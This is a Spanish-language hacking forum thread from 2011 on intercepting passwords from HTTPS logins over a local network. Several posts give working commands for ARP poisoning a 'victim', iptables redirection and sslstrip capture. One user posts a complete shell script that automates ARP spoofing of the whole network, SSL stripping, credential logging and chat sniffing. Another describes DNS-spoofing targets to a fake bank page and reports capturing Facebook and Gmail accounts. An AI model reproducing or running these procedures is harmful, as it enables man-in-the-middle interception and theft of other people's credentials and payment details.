Título: Ettercap - Contraseña SSL - Cual es mejor forma? Publicado por: SokarTefnut en 6 Marzo 2011, 22:23 pm Hola a todos, llevo poco tiempo en el mundo del Hacking,y me doy cuenta de que cuanto mas estudio, mas parece quedarme por aprender.
Tras analizar con Wireshark el trafico generado por cierta pagina web de entrada de usuario y contraseña, observo que utiliza el protocolo SSL, haciendo ARP-Spoof con Ettercap,éste no parece ser capaz de descifrar éste protocolo,aunque he leido que Ettercap es capaz. Mi pregunta es si alguien sabe el procedimiento,o que pluggin es necesario para conseguirlo. Lo he intentado desde Windows, y desde Linux,con BackTrack, pero ni en modo consola lo he logrado. Gracias por cualquier ayuda o sugerencia. Título: Re: Ettercap - Contraseña SSL - Cual es mejor forma? Publicado por: y0g-s0th0th en 7 Marzo 2011, 01:37 am con ettercap podes pero el certificado q genera, al ser falso, causa una alerta en el navegador del objetivo. lo mejor es usar sslstrip.
saludos Título: Re: Ettercap - Contraseña SSL - Cual es mejor forma? Publicado por: SokarTefnut en 7 Marzo 2011, 11:06 am Gracias por la respuesta,creo que encontré la manera de romper SSL usando sslstrip:
1.- Habilitamos la capacidad para reenvío (routing) del kernel echo 1 > /proc/sys/net/ipv4/ip_forward 2.- Comenzamos el envenenamiento ARP (arpspoof -i {interfaz_red} -t {ip_victima} {ip_router}) arpspoof -i eth0 -t 192.168.1.100 192.168.1.1 3.- Cambiamos la redireccion de puertos usando las iptables,de esta manera,estaremos transparentes para la victima,que podrá logearse sin problemas: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 4.- Comenzamos con sslstrip (sslstrip.py -w {nombre_del_archivo_de_captura}) sslstrip -w miarchivo 5.- Abrir otra shell si queremos ver en tiempo real la informacion tail -f miarchivo Título: Re: Ettercap - Contraseña SSL - Cual es mejor forma? Publicado por: y0g-s0th0th en 7 Marzo 2011, 19:16 pm si, creo q esta todo. si tenes problemas avisa q tengo algun tuto armado x ahi.
saludos Título: Re: Ettercap - Contraseña SSL - Cual es mejor forma? Publicado por: SokarTefnut en 8 Marzo 2011, 09:12 am No logro capturar nada, ni con el procedimiento explicado anteriormente, el archivo de captura se crea, pero siempre queda vacio, algo falla.
El ARP spoofing funciona correctamente, si miro la caché ARP de la víctima, me aparecen las MAC direccionadas hacia la maquina atacante, tanto ésta como el server. ¿ No es necesario direccionar el SSLSTRIP hacia la interfaz de red en uso ? (En mi caso eth0) Título: Re: Ettercap - Contraseña SSL - Cual es mejor forma? Publicado por: y0g-s0th0th en 9 Marzo 2011, 01:27 am no, asi deberia funcionar. seguro q haces bien el envenenamiento?
con ettercap q te pasaba? capturabas bien passes de texto plano? proba con ettercap sino en lugar de arpspoof a ver q pasa. saludos Título: Re: Ettercap - Contraseña SSL - Cual es mejor forma? Publicado por: valdomero en 24 Marzo 2011, 18:56 pm Hola.
He probado el backtrack 4 y usado el sslstrip consiguiendo sacar mi clave . Lo que ocurre es que cuando entro en el correo de forma directa ( sin meter la contraseña ) solo consigo ver el correo pero no la clave. Hay alguna forma de interpretar los datos cifrados que me aparecen en el sslstrip. Saludos Título: Re: Ettercap - Contraseña SSL - Cual es mejor forma? Publicado por: EvilGoblin en 29 Marzo 2011, 21:15 pm En el logeo automatico puede que se dirija directamente con https://
Lo que puedes hacer es matar ese proceso, (cortar la comunicacion) para que tenga que volverse a conectar. yo lo probe con facebook, gmail y otras cuentas y funciona lo mas bien. con cuentas de banco (ejem: visa) no logre que funcione. directamente tiene que ser si o si https: certificado por ellos. la unica forma es DNSarp. crear una pagina falsa y redirigir el trafico a tu pagina (si solicita visa en este caso) asi si lo logre, pero no logre que se vea bien la pagina xD :P pero es safable. Título: Re: Ettercap - Contraseña SSL - Cual es mejor forma? Publicado por: valdomero en 30 Marzo 2011, 00:33 am gracias EvilGoblin
He usado este comando /etc/rc.d/init.d/network restart , pero no he conseguido nada, claro que puede ser porque unos de los pc tiene windows. Si es por eso cual seria el comando en linux para reiniciar la conexion en mi torre que tiene xp Saludos Título: Re: Ettercap - Contraseña SSL - Cual es mejor forma? Publicado por: xexudj89 en 28 Abril 2011, 11:35 am Gracias por la respuesta,creo que encontré la manera de romper SSL usando sslstrip: 1.- Habilitamos la capacidad para reenvío (routing) del kernel echo 1 > /proc/sys/net/ipv4/ip_forward 2.- Comenzamos el envenenamiento ARP (arpspoof -i {interfaz_red} -t {ip_victima} {ip_router}) arpspoof -i eth0 -t 192.168.1.100 192.168.1.1 3.- Cambiamos la redireccion de puertos usando las iptables,de esta manera,estaremos transparentes para la victima,que podrá logearse sin problemas: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 4.- Comenzamos con sslstrip (sslstrip.py -w {nombre_del_archivo_de_captura}) sslstrip -w miarchivo 5.- Abrir otra shell si queremos ver en tiempo real la informacion tail -f miarchivo se podria hacer para que lo haga con toda la red a la vez o solo se puede con un pc a la vez?? Título: Re: Ettercap - Contraseña SSL - Cual es mejor forma? Publicado por: UsuarioEquis en 5 Mayo 2011, 03:11 am Yo utilizo el ettercap para arpspoofing y para snifear, y luego redirijo los puerto 80 y 443 al sslstrip, porque si lo dejo que lo haga el ettercap, a la victima le aparece en el browser una advertencia de certificado erróneo.
Aca te dejo un script que arme, create un archivo snifeototal.sh y pega el contenido del texto que escribo a continuación, luego de grabar #chmod 777 snifeototal.sh y por ultimo #./snifeototal.sh, espero que te sirva. texto a copiar: echo echo "Full Sniffing-----------------" echo "-------------by Usuario Equis" echo echo -n "Adaptador de RED: " read -e ADAPT echo -n "Puerta de Enlace o Gateway: " read -e GATEW echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -F xterm -geometry 75x75+1+1 -T "ARP Spoofing con Ettercap" -e ettercap -Tq -M arp:remote /$GATEW/ // -P autoadd -i $ADAPT -m /tmp/capturaetter.log sleep 1 iptables -t nat -L -n sleep 1 iptables -t nat -D PREROUTING 1 iptables -t nat -D PREROUTING 1 iptables -t nat -L -n sleep 1 iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000 iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 10000 xterm -geometry 75x35+1+100 -T "SSLStrip" -e sslstrip -k -l 10000 -a -w /tmp/captura.log sleep 1 xterm -geometry 75x35+1+200 -T "Visualizacion del Log" -e tail -f /tmp/captura.log xterm -geometry 75x35+1+300 -T "Visualizacion del Log de Ettercap" -e tail -f /tmp/capturaetter.log xterm -geometry 75x35+1+400 -T "Messenger" -e msgsnarf -i $ADAPT Título: Re: Ettercap - Contraseña SSL - Cual es mejor forma? Publicado por: Hwftk en 18 Septiembre 2011, 23:44 pm Hay un problema con Ettercap y Sslstrip, al ejecutar Sslstrip saltan demasiados errores y pasa lo mismo con Ettercap con un archivo lipcap y demás sockers, le pasa a alguien también? Saludos
Título: Re. Publicado por: alpha015 en 19 Septiembre 2011, 14:57 pm Olvidaros de Ettercap, dá muchos problemas. Instalad SSLStrip 0.9 en Backtrack 5 R1. Ponedlo a correr y lanzad el arp-spoofing, entonces se descifrarán todas las páginas. Sí queréis interceptar las contraseñas tan sólo tenéis que sniffear con Wireshark. Un saludo.
Título: Re: Re. Publicado por: Uxio en 21 Septiembre 2011, 23:23 pm Olvidaros de Ettercap, dá muchos problemas. Instalad SSLStrip 0.9 en Backtrack 5 R1. Ponedlo a correr y lanzad el arp-spoofing, entonces se descifrarán todas las páginas. Sí queréis interceptar las contraseñas tan sólo tenéis que sniffear con Wireshark. Un saludo. Añado a tu perfecta guía que los paquetes obtenidos puedes abrirlos con el ettercap (tiene una opción para analizar paquetes ya capturados), que ya tiene varios filtros para devolver passwords y nombres de usuario. Título: Re: Re. Publicado por: alpha015 en 22 Septiembre 2011, 01:41 am tu perfecta guía Ironía en estado puro... tan sólo trato de disminuír los quebraderos de cabeza a los principiantes como yo. Saludos. Título: Re: Re. Publicado por: Uxio en 22 Septiembre 2011, 14:32 pm Ironía en estado puro... tan sólo trato de disminuír los quebraderos de cabeza a los principiantes como yo. Saludos. Lo estoy diciendo completamente en serio. Creo que lo has explicado muy bien y de forma muy concisa. A ver si te crees que lo digo irónicamente porque yo tengo un superprograma que pulso un botón rojo y crackeo SSL, WPA2, y lo que me de la gana. Me has interpretado mal. Título: Re: Re. Publicado por: alpha015 en 23 Septiembre 2011, 20:25 pm Lo estoy diciendo completamente en serio. Creo que lo has explicado muy bien y de forma muy concisa. A ver si te crees que lo digo irónicamente porque yo tengo un superprograma que pulso un botón rojo y crackeo SSL, WPA2, y lo que me de la gana. Me has interpretado mal. Perdona no sabía, gracias pues... saludos. Título: Re: Re. Publicado por: Uxio en 23 Septiembre 2011, 21:00 pm Perdona no sabía, gracias pues... saludos. Ok, no hay problema. |